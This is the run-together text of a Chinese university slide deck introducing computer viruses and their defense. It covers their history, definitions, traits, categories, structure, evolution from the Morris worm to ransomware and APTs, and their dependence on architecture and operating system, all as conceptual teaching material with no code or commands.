計(jì)算機(jī)病毒技術(shù)及其防御PPT完整全套教學(xué)課件

計(jì)算機(jī)病毒技術(shù)及其防御

ComputerVirusTechnology&ItsDefense第1章-計(jì)算機(jī)病毒緒論第2章-計(jì)算機(jī)病毒基礎(chǔ)知識第3章-病毒分析平臺第4章-計(jì)算機(jī)病毒誕生第5章-計(jì)算機(jī)病毒傳播第6章-計(jì)算機(jī)病毒潛伏第7章-計(jì)算機(jī)病毒發(fā)作第8章-計(jì)算機(jī)病毒檢測第9章-計(jì)算機(jī)病毒凋亡全套可編輯PPT課件IntroductiontoComputerViruses計(jì)算機(jī)病毒概論第一章ChapterOneyclblak2008課程簡介課程考核方式課程成績＝課堂表現(xiàn)(20)+課外作業(yè)(30)+期末考試(機(jī)考50)；課堂表現(xiàn)：課堂問答發(fā)言與課堂實(shí)踐發(fā)言+出勤情況；課外作業(yè):15次實(shí)踐作業(yè)，部分作業(yè)需團(tuán)隊(duì)合作；提示：認(rèn)真上課，并完成課程作業(yè)和團(tuán)隊(duì)項(xiàng)目實(shí)踐的學(xué)生，都將能夠獲得良好的分?jǐn)?shù)。課程參考網(wǎng)站1.惡意代碼分析工具集/17bdw/p/10254565.html2.惡意軟件地址集/p/230000353.惡意代碼分析/Vxer-Lee/MalwareAnalysis/articles/system/287789.html前言PREFACE在網(wǎng)絡(luò)空間中，計(jì)算機(jī)病毒猶如數(shù)字頑疾，伴隨著信息技術(shù)的發(fā)展壯大而蔓延泛濫。從某種意義上說，只要有程序代碼的地方，都能看見計(jì)算機(jī)病毒的身影。計(jì)算機(jī)病毒是IT的伴生者。眾所周知，任何新技術(shù)都具有雙面性，既能服務(wù)于大眾，又能為計(jì)算機(jī)病毒所利用而為患網(wǎng)絡(luò)空間。因此，計(jì)算機(jī)病毒是伴隨IT發(fā)展揮之不去的黑色創(chuàng)痕與技術(shù)頑疾。有風(fēng)方起浪，無潮水自平。——明·吳承恩1計(jì)算機(jī)病毒起源目錄2計(jì)算機(jī)病毒定義3計(jì)算機(jī)病毒特性4計(jì)算機(jī)病毒類型5計(jì)算機(jī)病毒結(jié)構(gòu)6計(jì)算機(jī)病毒進(jìn)化7計(jì)算機(jī)病毒環(huán)境8計(jì)算機(jī)病毒生命周期1計(jì)算機(jī)病毒起源計(jì)算機(jī)病毒理論起源計(jì)算機(jī)病毒游戲起源計(jì)算機(jī)病毒科幻起源計(jì)算機(jī)病毒實(shí)驗(yàn)起源計(jì)算機(jī)病毒理論起源馮?諾伊曼與戈德斯坦、勃克斯等人發(fā)表《EDVAC報(bào)告書的第一份草案》——“101頁報(bào)告”。二進(jìn)制代替十進(jìn)制，將計(jì)算機(jī)從結(jié)構(gòu)上分成五大組件：控制器、運(yùn)算器、存儲器、輸入設(shè)備和輸出設(shè)備?，F(xiàn)代計(jì)算機(jī)科學(xué)發(fā)展史的里程碑式文獻(xiàn)。1945.6.30

101頁報(bào)告→計(jì)算機(jī)病毒理論起源計(jì)算機(jī)病毒理論起源發(fā)表論文《復(fù)雜自動(dòng)裝置的理論及組識》，論證了自我復(fù)制程序存在的可能性。首次提出用自我構(gòu)建的自動(dòng)機(jī)來仿制自然界的自我復(fù)制過程：該系統(tǒng)由三部分組成，即圖靈機(jī)、構(gòu)造器和保存于磁帶上的信息；圖靈機(jī)通過讀取磁帶上的信息，借由構(gòu)造器來構(gòu)建相關(guān)內(nèi)容；如果磁帶上存儲著重建自身所必需的信息，則該自動(dòng)機(jī)就能通過自我復(fù)制來重建自身。1949年

馮?諾伊曼——自我復(fù)制過程、圖靈機(jī)→計(jì)算機(jī)病毒理論起源自我復(fù)制自動(dòng)機(jī)計(jì)算機(jī)病毒理論起源細(xì)胞自動(dòng)復(fù)制過程來描述自我復(fù)制機(jī)模型：使用200，000個(gè)細(xì)胞構(gòu)建了一個(gè)可自我復(fù)制的結(jié)構(gòu)。該模型從數(shù)學(xué)上證明了自我復(fù)制的可能性。該模型勾勒出計(jì)算機(jī)病毒出現(xiàn)的可能性。后來

馮?諾伊曼——自我復(fù)制機(jī)模型→計(jì)算機(jī)病毒科幻起源《P-1的春天》《震蕩波騎士》作者在該書中構(gòu)思了一種能夠自我復(fù)制、利用信息通道傳播的計(jì)算機(jī)程序，并稱之為計(jì)算機(jī)病毒。該計(jì)算機(jī)病毒最后控制了7,000臺計(jì)算機(jī)，造成了一場空前災(zāi)難?？苹眯≌f是啟發(fā)程序員開發(fā)現(xiàn)實(shí)中類似程序的實(shí)例，可視為計(jì)算機(jī)病毒的科幻前世。

講述了男主角在網(wǎng)絡(luò)社會中用蠕蟲程序改寫自己身份，然后逃避懲罰的故事。精確地預(yù)言了如今的大規(guī)模網(wǎng)絡(luò)、黑客、基因工程和計(jì)算機(jī)病毒等概念與事物。計(jì)算機(jī)病毒游戲起源磁芯大戰(zhàn)1966年，美國貝爾實(shí)驗(yàn)室的道格拉斯?麥基爾羅伊、維克多?維索特斯克以及羅伯特?莫里斯共同開發(fā)了名為“達(dá)爾文”的游戲程序。該程序最初是在貝爾實(shí)驗(yàn)室PDP-1上運(yùn)行，后來便演變?yōu)椤按判敬髴?zhàn)”。程序通過不斷移動(dòng)自身來避免被其他程序攻擊或在自身遭受攻擊后進(jìn)行自動(dòng)修復(fù)并試圖破壞其他程序，生存到最后的即為勝者。“磁芯大戰(zhàn)”具備了計(jì)算機(jī)病毒的自我復(fù)制與破壞系統(tǒng)的特質(zhì)。計(jì)算機(jī)病毒游戲起源貝爾實(shí)驗(yàn)室是一家位于美國新澤西州墨里山的著名研究機(jī)構(gòu)，成立于1925年，是AT&T（美國電話電報(bào)公司）的子公司。貝爾實(shí)驗(yàn)室在科技領(lǐng)域具有悠久的歷史和卓越的成就，被譽(yù)為“科技創(chuàng)新的搖籃”。貝爾實(shí)驗(yàn)室的研究領(lǐng)域廣泛，涉及通信、計(jì)算機(jī)科學(xué)、材料科學(xué)、物理學(xué)等眾多領(lǐng)域。在貝爾實(shí)驗(yàn)室的歷史上，取得了許多重要的科技成果，如晶體管、信息論、UNIX操作系統(tǒng)、C語言、蜂窩移動(dòng)通信技術(shù)、光纖通信等。AT&T貝爾實(shí)驗(yàn)室計(jì)算機(jī)病毒實(shí)驗(yàn)起源弗雷德?科恩編寫了一個(gè)能自我復(fù)制，引起系統(tǒng)死機(jī)并能在計(jì)算機(jī)之間傳播的程序。發(fā)表《ComputerVirus—TheoryandExperiments》，將計(jì)算機(jī)病毒所具備的破壞性公諸于眾。提出了第一個(gè)學(xué)術(shù)性的、非形式化的定義。提出科恩范式，讓安全研究者放棄了尋找安全永動(dòng)機(jī)，從而走上了進(jìn)行工程對抗的反病毒研究路線。

計(jì)算機(jī)病毒之父計(jì)算機(jī)病毒實(shí)驗(yàn)起源巴基斯坦兄弟C-Brain病毒為了防止軟件非法拷貝，跟蹤并打擊盜版行為，而開發(fā)的一個(gè)附加在程序上的“小程序”。該“小程序”通過軟盤傳播，只在盜拷軟件時(shí)才發(fā)作，發(fā)作時(shí)將盜拷者的硬盤剩余空間占滿。屬于引導(dǎo)區(qū)病毒，是DOS時(shí)代的首例計(jì)算機(jī)病毒，同時(shí)還是第一例隱匿型病毒，被感染的計(jì)算機(jī)不會呈現(xiàn)明顯癥狀。C-Brain病毒2計(jì)算機(jī)病毒定義計(jì)算機(jī)病毒定義狹義生物病毒廣義的生物病毒一種獨(dú)特的傳染物質(zhì)，它能夠利用宿主細(xì)胞的營養(yǎng)物質(zhì)來自主地復(fù)制病毒自身的DNA或者RNA以及蛋白質(zhì)等生命組成物質(zhì)的微小生命體。指可以在生物體間傳播并感染生物體的微小生物，包括擬病毒、類病毒和病毒粒子等。計(jì)算機(jī)病毒定義狹義的計(jì)算機(jī)病毒廣義的計(jì)算機(jī)病毒惡意代碼專指那些具有自我復(fù)制功能的計(jì)算機(jī)代碼。指在未明確提示用戶或未經(jīng)用戶許可的情況下，在用戶計(jì)算機(jī)或其他終端上安裝運(yùn)行，對網(wǎng)絡(luò)或系統(tǒng)會產(chǎn)生威脅或潛在威脅，侵犯用戶合法權(quán)益的計(jì)算機(jī)代碼。主要類型：計(jì)算機(jī)病毒（狹義的）、特洛伊木馬、計(jì)算機(jī)蠕蟲、后門、邏輯炸彈、Rootkit、僵尸網(wǎng)絡(luò)、間諜軟件、廣告軟件、勒索軟件挖礦軟件等?；A(chǔ)知識

3計(jì)算機(jī)病毒特性繁殖性破壞性傳染性潛伏性可觸發(fā)性衍生性不可預(yù)見性繁殖性繁殖原理意義基于計(jì)算機(jī)程序代碼的自我復(fù)制。病毒作者編寫一種程序，將其插入到其他程序或文件中。當(dāng)被感染的程序或文件運(yùn)行時(shí)，病毒代碼也會運(yùn)行，并開始在計(jì)算機(jī)系統(tǒng)中復(fù)制自己。判斷某段程序是否為計(jì)算機(jī)病毒的重要條件之一。計(jì)算機(jī)病毒不斷演化發(fā)展的基礎(chǔ)，通過不斷繁殖自身，產(chǎn)生盡可能多的子代，才能促進(jìn)計(jì)算機(jī)病毒家族根繁葉茂并不斷進(jìn)化發(fā)展。計(jì)算機(jī)病毒可視為網(wǎng)絡(luò)空間中的一種人工生命體。為擴(kuò)大感染范圍、造成重要影響，會像生物病毒一樣通過自我復(fù)制來進(jìn)行大量繁殖?；A(chǔ)知識破壞性破壞力有炫耀表現(xiàn)之意而無破壞之實(shí)；占用大量系統(tǒng)資源，導(dǎo)致系統(tǒng)負(fù)荷超載或系統(tǒng)崩潰；占用少數(shù)系統(tǒng)資源占用極少，竊取敏感數(shù)據(jù)，泄露隱私信息或損害知識產(chǎn)權(quán)。內(nèi)涵計(jì)算機(jī)病毒的本質(zhì)體現(xiàn)，表現(xiàn)出其獨(dú)特的目的性，是計(jì)算機(jī)病毒背后的編程者的意志體現(xiàn)。傳染性目的傳輸介質(zhì)意義想方設(shè)法、將其拷貝體從一個(gè)系統(tǒng)擴(kuò)散至更多系統(tǒng)。軟盤、硬盤、移動(dòng)硬盤、計(jì)算機(jī)網(wǎng)絡(luò)。傳染性是計(jì)算機(jī)病毒的本質(zhì)體現(xiàn)，是其擴(kuò)大攻擊面、不斷演化發(fā)展的基礎(chǔ)。是計(jì)算機(jī)病毒的基本特性，判斷某段程序是否為計(jì)算機(jī)病毒的最重要條件。表現(xiàn)目的意義在感染目標(biāo)系統(tǒng)后會相對安靜地隱匿于系統(tǒng)中以待時(shí)機(jī)。一旦時(shí)機(jī)成熟，當(dāng)其觸發(fā)條件滿足時(shí)，計(jì)算機(jī)病毒便會極力繁殖、四處擴(kuò)散、危害系統(tǒng)。多為避人耳目，以免引起用戶或安全軟件注意，從而更好地保護(hù)自身。計(jì)算機(jī)病毒適應(yīng)外部環(huán)境、保護(hù)自身、更好生息繁衍的進(jìn)化明證。潛伏性可觸發(fā)性觸發(fā)條件典型病毒一種條件控制機(jī)制，用以控制感染、破壞行為的發(fā)作時(shí)間與頻率。當(dāng)所設(shè)定的觸發(fā)條件因某個(gè)事件或數(shù)值而滿足時(shí)，計(jì)算機(jī)病毒便會觸發(fā)而實(shí)施感染或攻擊行為。

觸發(fā)條件很多，主要有時(shí)間、日期、文件類型、特定操作或特定數(shù)據(jù)等。CIH病毒——每月26日觸發(fā)臺灣一號病毒——每月1號觸發(fā)可觸發(fā)性不可預(yù)見性由于計(jì)算機(jī)技術(shù)的多樣性與不確定性、人的意愿的多樣性與不確定性，決定了計(jì)算機(jī)病毒的不可預(yù)見性。計(jì)算機(jī)病毒的不可預(yù)見性，是多數(shù)安全軟件所采用的反病毒技術(shù)滯后于計(jì)算機(jī)病毒技術(shù)的理論基礎(chǔ)，也是計(jì)算機(jī)病毒演化發(fā)展的表現(xiàn)。4計(jì)算機(jī)病毒類型按照存儲介質(zhì)劃分按照感染系統(tǒng)劃分按照破壞性劃分按照算法功能劃分按照存儲介質(zhì)劃分通常存儲在系統(tǒng)的引導(dǎo)區(qū)，通過修改系統(tǒng)引導(dǎo)記錄并利用系統(tǒng)加載順序而優(yōu)先啟動(dòng)自身。引導(dǎo)區(qū)病毒一般感染計(jì)算機(jī)系統(tǒng)中的可執(zhí)行文件或數(shù)據(jù)文件，COM文件、EXE文件或DOC文件、PDF文件等，并借助文件的加載執(zhí)行而啟動(dòng)病毒自身。文件病毒通過將自身寄生于網(wǎng)頁并通過用戶瀏覽網(wǎng)頁時(shí)完成感染與傳播。網(wǎng)頁病毒將自身作為電子郵件附件，并借助社會工程學(xué)原理誘使用戶打開鏈接以完成感染與加載。郵件病毒寄生在U盤中，并借助Windows系統(tǒng)的自動(dòng)播放功能來完啟動(dòng)與感染U盤病毒按照感染系統(tǒng)劃分DOS病毒W(wǎng)indows病毒OS/2病毒按照感染系統(tǒng)劃分智能終端系統(tǒng)Android病毒IOS病毒計(jì)算機(jī)操作系統(tǒng)Unix病毒按照破壞性劃分名稱影響無害型病毒占用系統(tǒng)少量資源（CPU時(shí)間、內(nèi)存空間、磁盤空間、網(wǎng)絡(luò)帶寬等）之外，對目標(biāo)系統(tǒng)基本無影響無危險(xiǎn)型病毒占用系統(tǒng)資源，可能還會在顯示器上顯示圖像、動(dòng)畫或發(fā)出某種聲音危險(xiǎn)型病毒可能對目標(biāo)系統(tǒng)造成嚴(yán)重的錯(cuò)誤及影響惡性病毒會對系統(tǒng)造成無法預(yù)料的或?yàn)?zāi)難性的破壞作用，例如，刪除程序、破壞數(shù)據(jù)、清除系統(tǒng)內(nèi)存區(qū)和操作系統(tǒng)中重要的信息、竊取或加密用戶敏感數(shù)據(jù)等按算法功能劃分名稱影響病毒專指感染寄生于其他文件中的計(jì)算機(jī)病毒蠕蟲通過系統(tǒng)漏洞、電子郵件、共享文件夾、即時(shí)通信軟件、可移動(dòng)存儲介質(zhì)來傳播自身的計(jì)算機(jī)病毒木馬在用戶不知情、未授權(quán)的情況下，感染用戶系統(tǒng)并以隱蔽方式運(yùn)行的計(jì)算機(jī)病毒，后門可視為木馬的一種類型邏輯炸彈在特定邏輯條件滿足時(shí)實(shí)施破壞的計(jì)算機(jī)病毒；間諜軟件是指在用戶不知情的情況下，在其計(jì)算機(jī)系統(tǒng)上安裝后門、收集用戶信息的計(jì)計(jì)算機(jī)病毒勒索軟件黑客用來劫持用戶資產(chǎn)或資源并以此為條件向用戶勒索錢財(cái)?shù)囊环N計(jì)算機(jī)病毒，是現(xiàn)階段影響最廣、數(shù)量最多的一類計(jì)算機(jī)病毒。5計(jì)算機(jī)病毒結(jié)構(gòu)1）病毒引導(dǎo)模塊用于將計(jì)算機(jī)病毒程序從外部存儲介質(zhì)加載并駐留于內(nèi)存，并使后續(xù)的傳染2）病毒傳染模塊用于在目標(biāo)系統(tǒng)進(jìn)行磁盤讀寫或網(wǎng)絡(luò)連接時(shí)，判斷該目標(biāo)對象是否符合感染條件，如符合條件則將病毒程序傳染對方并伺機(jī)破壞。3）病毒觸發(fā)模塊用于判斷計(jì)算機(jī)病毒所設(shè)定的邏輯條件是否滿足，如滿足則啟動(dòng)表現(xiàn)模塊，進(jìn)行相關(guān)的破壞或表現(xiàn)操作。4）病毒表現(xiàn)模塊該模塊是計(jì)算機(jī)病毒在觸發(fā)條件滿足后所執(zhí)行的一系列表現(xiàn)或具有破壞作用的操作，以顯示其存在并達(dá)到相關(guān)攻擊目的。計(jì)算機(jī)病毒結(jié)構(gòu)計(jì)算機(jī)病毒結(jié)構(gòu)6計(jì)算機(jī)病毒外部環(huán)境變遷視角計(jì)算機(jī)病毒攻擊載體視角計(jì)算機(jī)病毒編寫者視角計(jì)算機(jī)病毒進(jìn)化計(jì)算機(jī)病毒外部環(huán)境變遷視角1986年首例計(jì)算機(jī)病毒誕生，IBM-PC兼容機(jī)搭載MS-DOS系統(tǒng)內(nèi)存空間局限于640KB，感染可執(zhí)行文件格式：.COM文件和.EXE文件，且是單任務(wù)運(yùn)行。將其自身寄生于其他可執(zhí)行文件（宿主程序）中，并借助宿主程序的執(zhí)行而運(yùn)行病毒體，通過硬盤、軟盤、光盤等介質(zhì)外向傳播，傳播速度相對緩慢，反病毒軟件在應(yīng)對計(jì)算機(jī)病毒時(shí)有充足的反應(yīng)時(shí)間，通過提取病毒特征碼并使用特征碼檢測法進(jìn)行查殺。感染型病毒蠕蟲2000年時(shí)，Internet采用TCP/IP協(xié)議族的全球開發(fā)型計(jì)算機(jī)互聯(lián)網(wǎng)絡(luò)——一個(gè)巨大的信息資料共享庫，建成為最大、最重要的全球網(wǎng)絡(luò)基礎(chǔ)設(shè)施。使所有人都可參與其中，共享自己所創(chuàng)造的資源。利用網(wǎng)絡(luò)漏洞進(jìn)行傳播，使單擊蠕蟲突破感染型病毒傳播速度極限，造成大面積感染，蠕蟲的誕生標(biāo)志著網(wǎng)絡(luò)開始成為計(jì)算機(jī)病毒傳播新途徑。計(jì)算機(jī)病毒外部環(huán)境變遷視角莫里斯蠕蟲

計(jì)算機(jī)病毒外部環(huán)境變遷視角1988年11月2日首次被釋放。美國康奈爾大學(xué)的研究生羅伯特·T·莫里斯編寫和發(fā)布。該蠕蟲是互聯(lián)網(wǎng)上第一個(gè)廣泛傳播的惡意軟件，在短時(shí)間內(nèi)感染了大量的計(jì)算機(jī)，導(dǎo)致互聯(lián)網(wǎng)出現(xiàn)嚴(yán)重的擁塞和癱瘓，許多大學(xué)、政府和軍事機(jī)構(gòu)的計(jì)算機(jī)系統(tǒng)受到影響，無法正常工作。對當(dāng)時(shí)的互聯(lián)網(wǎng)造成了超過1億美元的經(jīng)濟(jì)損失。傳播原理利用系統(tǒng)漏洞：莫里斯蠕蟲利用了當(dāng)時(shí)UNIX系統(tǒng)中sendmail和finger程序存在的漏洞，利用這些漏洞，蠕蟲可以輕松入侵其他計(jì)算機(jī)系統(tǒng)。自我復(fù)制：莫里斯蠕蟲會利用這些漏洞，將自己的代碼復(fù)制到其他計(jì)算機(jī)上。復(fù)制成功后，蠕蟲會偽裝成其他程序，使得被感染的計(jì)算機(jī)無法輕易發(fā)現(xiàn)病毒。傳播：復(fù)制成功后，蠕蟲會繼續(xù)利用系統(tǒng)漏洞，嘗試感染其他計(jì)算機(jī)。這種自我復(fù)制和傳播的過程持續(xù)進(jìn)行，導(dǎo)致蠕蟲在互聯(lián)網(wǎng)上迅速傳播。莫里斯蠕蟲

計(jì)算機(jī)病毒外部環(huán)境變遷視角計(jì)算機(jī)病毒外部環(huán)境變遷視角通常采用Client/Server服務(wù)模式，通過將其服務(wù)端裝載至目標(biāo)系統(tǒng)，再利用客戶端與其聯(lián)控以實(shí)現(xiàn)相關(guān)功能。單機(jī)終端系統(tǒng)的安全性隨著WindowsXP等系統(tǒng)的廣泛應(yīng)用而得到一定程度的提升，Windows系統(tǒng)的DEP（數(shù)據(jù)執(zhí)行保護(hù)）、ALSR（地址空間布局隨機(jī)化）等保護(hù)技術(shù)成為系統(tǒng)的默認(rèn)安全配置。木馬計(jì)算機(jī)病毒外部環(huán)境變遷視角AV終結(jié)者是一種惡意軟件，其主要目的是破壞或禁用安裝在計(jì)算機(jī)上的反病毒軟件。主要行為有識別反病毒軟件、禁用反病毒軟件、阻止更新、傳播其他惡意軟件。AV終結(jié)者的出現(xiàn)使得計(jì)算機(jī)面臨更大的安全風(fēng)險(xiǎn)，因?yàn)樗沟貌《竞蛺阂廛浖跊]有有效防護(hù)措施的情況下更容易入侵和破壞計(jì)算機(jī)系統(tǒng)。AV終結(jié)者背景網(wǎng)絡(luò)互聯(lián)的普及性、網(wǎng)絡(luò)犯罪的趨利性、數(shù)字貨幣交易的隱蔽性，致使勒索病毒大行其道、泛濫猖獗。通過網(wǎng)絡(luò)漏洞、網(wǎng)絡(luò)釣魚等途徑感染目標(biāo)系統(tǒng)，并借助加密技術(shù)來鎖定受害者資料使其無法正常存取信息，再通過勒索贖金來提供解密密鑰以恢復(fù)系統(tǒng)訪問。勒索病毒計(jì)算機(jī)病毒外部環(huán)境變遷視角發(fā)展歷程1.早期勒索病毒（1989年-2006年）早期的勒索軟件通常針對個(gè)人計(jì)算機(jī)，要求受害者通過郵寄方式支付贖金。這一階段的勒索軟件技術(shù)較為簡單，傳播范圍有限。2.加密勒索病毒（2006年-2013年）開始通過電子郵件和惡意網(wǎng)站進(jìn)行傳播。采用了加密技術(shù)，使得受害者的文件無法訪問。同時(shí)，贖金支付方式也開始多樣化，包括電子貨幣、預(yù)付卡等。3.網(wǎng)絡(luò)犯罪團(tuán)伙時(shí)代（2013年-至今）網(wǎng)絡(luò)犯罪團(tuán)伙開始大范圍地開發(fā)和傳播勒索病毒，利用先進(jìn)的加密技術(shù)和匿名支付手段，使得受害者難以追蹤和反擊。這一階段出現(xiàn)了許多臭名昭著的勒索病毒，如CryptoLocker、CryptoWall和WannaCry等。4.勒索病毒的多樣化和復(fù)雜化（近年來）現(xiàn)代勒索病毒不僅針對個(gè)人計(jì)算機(jī)，還開始攻擊企業(yè)、政府機(jī)構(gòu)等大型組織，造成更嚴(yán)重的損失。此外，勒索病毒與其他惡意軟件（如僵尸網(wǎng)絡(luò)、惡意挖礦軟件）結(jié)合，形成復(fù)合型威脅。計(jì)算機(jī)病毒外部環(huán)境變遷視角影響目的區(qū)塊鏈數(shù)據(jù)分析公司CipherTrace報(bào)告顯示：2019年加密數(shù)字貨幣犯罪造成的損失超過45億美元，較2018年的17.4億美元增長了近160%隨著數(shù)字經(jīng)濟(jì)與區(qū)塊鏈技術(shù)的深度融合，加密數(shù)字貨幣成為其關(guān)鍵與核心支撐因子。由于黑灰產(chǎn)業(yè)在暗網(wǎng)中進(jìn)行非法數(shù)據(jù)或數(shù)字武器販賣、加密勒索贖金支付時(shí)，加密數(shù)字貨幣是黑灰產(chǎn)業(yè)的流通貨幣，挖礦是產(chǎn)生并獲取加密數(shù)字貨幣的主要途徑。挖礦病毒

計(jì)算機(jī)病毒外部環(huán)境變遷視角通過對常規(guī)計(jì)算機(jī)發(fā)起挖礦攻擊，非法盜用他人的計(jì)算資源來挖礦，從中牟取巨大經(jīng)濟(jì)利益。單一式病毒攻擊復(fù)合式病毒攻擊APT攻擊自2005年之后各類病毒相互借鑒感染、傳播、隱匿、免殺等方面技術(shù)方法，開始相互滲透與交叉融合。1986年之后的15年間，各種病毒平行發(fā)展，互不干涉。APT以攻擊基礎(chǔ)設(shè)施、竊取敏感情報(bào)為目的，且具有強(qiáng)烈的國家戰(zhàn)略意圖，從而使網(wǎng)絡(luò)安全威脅由散兵游勇式的隨機(jī)攻擊演化為有目的、有組織、有預(yù)謀的群體式定向攻擊。計(jì)算機(jī)病毒攻擊載體視角計(jì)算機(jī)病毒編寫者視角炫技式病毒必須具備聰明才智和高超編程技術(shù)，才能完成計(jì)算機(jī)病毒的編寫。所以計(jì)算機(jī)病毒成為編程技術(shù)高手們炫耀技術(shù)的絕佳方式與成果展示。典型炫技式病毒：C-Brain病毒、CIH病毒病毒法律網(wǎng)絡(luò)計(jì)算機(jī)病毒編寫者視角CIH病毒——陳盈豪1998年，臺灣學(xué)生陳盈豪編寫了CIH病毒，當(dāng)時(shí)他只有20歲。CIH病毒主要危害有覆蓋和破壞數(shù)據(jù)、破壞硬件、自我傳播等。在當(dāng)時(shí)造成了嚴(yán)重的破壞，許多計(jì)算機(jī)系統(tǒng)受到感染，導(dǎo)致數(shù)據(jù)丟失和硬件損壞。隨著病毒的傳播和破壞性行為，陳盈豪因制造計(jì)算機(jī)病毒而受到關(guān)注。在CIH病毒爆發(fā)后不久，臺灣警方逮捕了陳盈豪。他最終被判處兩年有期徒刑，但隨后獲得了緩刑。計(jì)算機(jī)病毒編寫者視角現(xiàn)實(shí)物理空間向網(wǎng)絡(luò)虛擬空間延伸時(shí)，現(xiàn)實(shí)世界的逐利性向網(wǎng)絡(luò)空間蔓延。網(wǎng)絡(luò)支付與數(shù)字貨幣代替現(xiàn)實(shí)世界真實(shí)支付、網(wǎng)絡(luò)空間的簡單點(diǎn)擊即可現(xiàn)實(shí)世界的財(cái)富與利益、炫技式病毒向逐利式病毒轉(zhuǎn)換。典型病毒2017年：WannaCry勒索病毒、2018年：WannaMine挖礦病、網(wǎng)絡(luò)釣魚、僵尸網(wǎng)絡(luò)逐利式病毒計(jì)算機(jī)病毒編寫者視角以攻擊基礎(chǔ)設(shè)施、竊取敏感情報(bào)為目的。具有強(qiáng)烈的國家戰(zhàn)略意圖，同時(shí)已具備網(wǎng)絡(luò)戰(zhàn)雛形。病毒攻擊持續(xù)更長現(xiàn)實(shí)威脅極大。從散兵游勇式隨機(jī)逐利式攻擊向有目的、有組織、有預(yù)謀群體定向式攻擊。典型病毒2010年：Stuxnet震網(wǎng)病毒攻擊伊朗核電站2022年：西北工業(yè)大學(xué)遭美國NSA攻擊國家博弈式病毒7計(jì)算機(jī)體系結(jié)構(gòu)依賴計(jì)算機(jī)操作系統(tǒng)依賴文件系統(tǒng)及文件格式依賴解釋環(huán)境依賴

計(jì)算機(jī)病毒外部環(huán)境變遷視角

計(jì)算機(jī)病毒編寫者視角

計(jì)算機(jī)病毒攻擊載體視角

計(jì)算機(jī)病毒環(huán)境計(jì)算機(jī)體系結(jié)構(gòu)依賴從存儲器中取出指令并根據(jù)指令要求發(fā)出控制信號控制計(jì)算機(jī)的操作。其中中的程序計(jì)數(shù)器指明要執(zhí)行的指令所在的存儲單元地址。程序計(jì)數(shù)器一般按順序遞增，但可按指令要求而改變。按地址訪問的線性編址的一維結(jié)構(gòu)，每個(gè)單元的位數(shù)固定。指令和數(shù)據(jù)不加區(qū)別混合存儲在同一個(gè)存儲器中。以運(yùn)算器為中心，輸入/輸出（IO）設(shè)備與存儲器之間的數(shù)據(jù)傳送都經(jīng)過運(yùn)算器。指令系統(tǒng)結(jié)構(gòu)應(yīng)用程序編程接口（API）是一組定義了軟件之間如何交互的規(guī)則、協(xié)議和工具。為開發(fā)者提供了一種簡潔、標(biāo)準(zhǔn)化的方法來調(diào)用其他軟件、服務(wù)和設(shè)備的功能，從而實(shí)現(xiàn)不同系統(tǒng)之間的集成和協(xié)作。API的主要作用：簡化開發(fā)、促進(jìn)集成、提高可擴(kuò)展性。API的類型：基于HTTP的API、基于庫的API、基于服務(wù)的API、自定義API。總之，API是一種重要的軟件開發(fā)工具，它簡化了開發(fā)過程，促進(jìn)了不同系統(tǒng)之間的集成和協(xié)作。在現(xiàn)代軟件開發(fā)中，API已經(jīng)成為了不可或缺的一部分。計(jì)算機(jī)體系結(jié)構(gòu)依賴指令系統(tǒng)結(jié)構(gòu)應(yīng)用程序二進(jìn)制接口（ABI）是一組規(guī)則和規(guī)范，定義了應(yīng)用程序與操作系統(tǒng)、庫和其他軟件之間的低級接口。規(guī)定了如何通過二進(jìn)制文件（如可執(zhí)行文件、庫文件等）在軟件之間傳遞數(shù)據(jù)和調(diào)用函數(shù)，從而確保不同軟件之間的兼容性和互操作性。ABI的主要組成部分：數(shù)據(jù)類型、數(shù)據(jù)結(jié)構(gòu)布局、函數(shù)調(diào)用約定、系統(tǒng)調(diào)用、名字修飾。ABI的作用：確保兼容性、簡化開發(fā)、提高可維護(hù)性。總之，ABI是一種重要的軟件開發(fā)技術(shù)，它確保了不同軟件之間的兼容性和互操作性，有助于簡化開發(fā)過程、提高可維護(hù)性。計(jì)算機(jī)體系結(jié)構(gòu)依賴指令系統(tǒng)結(jié)構(gòu)（ISA）是一種計(jì)算機(jī)硬件與軟件之間的接口規(guī)范，它定義了一組計(jì)算機(jī)處理器支持的指令集合和執(zhí)行方式。ISA的主要組成部分：指令集、寄存器集合、內(nèi)存訪問、輸入/輸出（I/O）。ISA的作用：硬件抽象、兼容性和可移植性、性能優(yōu)化?？傊琁SA是一種重要的計(jì)算機(jī)技術(shù)，它為程序員提供了一個(gè)硬件抽象模型，確保了不同處理器之間的兼容性和可移植性，有助于簡化程序設(shè)計(jì)過程、提高性能。指令系統(tǒng)結(jié)構(gòu)計(jì)算機(jī)體系結(jié)構(gòu)依賴計(jì)算機(jī)體系結(jié)構(gòu)依賴計(jì)算機(jī)病毒的體系結(jié)構(gòu)依賴性特性任何計(jì)算機(jī)病毒都必須依賴一種特定的計(jì)算機(jī)體系結(jié)構(gòu)。計(jì)算機(jī)病毒必須依賴相關(guān)體系結(jié)構(gòu)并遵循相關(guān)指令系統(tǒng)，才能利用代碼獲得對該體系結(jié)構(gòu)的操控權(quán)。計(jì)算機(jī)病毒的代碼編寫與運(yùn)行，都必須依賴于特定體系結(jié)構(gòu)中的指令系統(tǒng)和操作系統(tǒng)環(huán)境。計(jì)算機(jī)結(jié)構(gòu)體系結(jié)構(gòu)組成數(shù)據(jù)表示、尋址方式、指令系統(tǒng)、中斷系統(tǒng)、存儲系統(tǒng)、輸入輸出系統(tǒng)、流失線處理機(jī)、超標(biāo)量處理機(jī)、互聯(lián)網(wǎng)絡(luò)、向量處理機(jī)、并行處理機(jī)、多處理機(jī)等計(jì)算機(jī)相關(guān)屬性，基礎(chǔ)知識計(jì)算機(jī)操作系統(tǒng)依賴名稱影響存儲管理分為幾種功能：存儲分配、存儲共享、存儲保護(hù)、存儲擴(kuò)張。設(shè)備管理分有以下功能：設(shè)備分配、設(shè)備傳輸控制、設(shè)備獨(dú)立性。文件管理文件存儲空間的管理、目錄管理、文件操作管理、文件保護(hù)。作業(yè)管理負(fù)責(zé)處理用戶提交的任何要求。進(jìn)程管理進(jìn)程調(diào)度，在單用戶單任務(wù)的情況下，處理器為單用戶的單任務(wù)所獨(dú)占，但在多道程序或多用戶組織多個(gè)作業(yè)或任務(wù)時(shí)，要解決處理器的調(diào)度、分配和回收等問題。

